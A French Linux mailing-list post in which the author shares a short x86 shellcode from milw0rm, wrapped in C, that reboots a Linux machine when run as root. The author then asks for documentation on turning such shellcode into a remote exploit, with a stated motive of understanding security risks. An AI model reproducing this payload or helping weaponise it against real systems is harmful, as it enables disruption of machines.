Bonjour
Pour une fois ,je vais être un brin hs , mais on reste dans un cadre
linuxien
Voila , j'ai parcouru http://www.milw0rm.com/
et à présent que je peux hacker la tarte aux fraises de ma grand-mère ,
je me pose
certaines questions existencielles :
voici un code qui permet de faire rebooter un pc linux
(je l'ai testé ,il fonctionne ) parmi d'autres moins anodins
char shellcode[] =
"\x6a\x58" // push $0x58
"\x58" // pop %eax
"\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx
"\xb9\x69\x19\x12\x28" // mov $0x28121969,%ecx
"\xba\x67\x45\x23\x01" // mov $0x1234567,%edx
"\xcd\x80"; // int $0x80
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
Le lancer en local n'a qu'un intérêt somme toute relatif (sauf à aimer faire joujou avec son serveur X)
Donc pour en faire un remote exploit , il faut donc l'insérer dans un programme existant , ou
bien le faire executer d'une facon ou d'une autre par des utilisateurs ayant les droits root
(en user normal cela ne fonctionne pas)
Et c'est d'ailleurs le cas pour les shellcodes que j'ai trouvé jusqu'ici
C'est ici que je recherche de la doc à ce sujet , non pas pour l'utiliser frauduleusement ,mais
avant tout pour comprendre et mieux me rendre compte de l'utilité de ne pas télécharger depuis n'importe quelles sources
ou ne pas faire n'importe quoi en root .
merci
=========================================
Vous souhaitez acquerir votre Pack ou des Services Mandriva?
Rendez-vous sur "http://store.mandriva.com";.
Rejoignez le club mandrake : http://www.mandrivaclub.com
=========================================
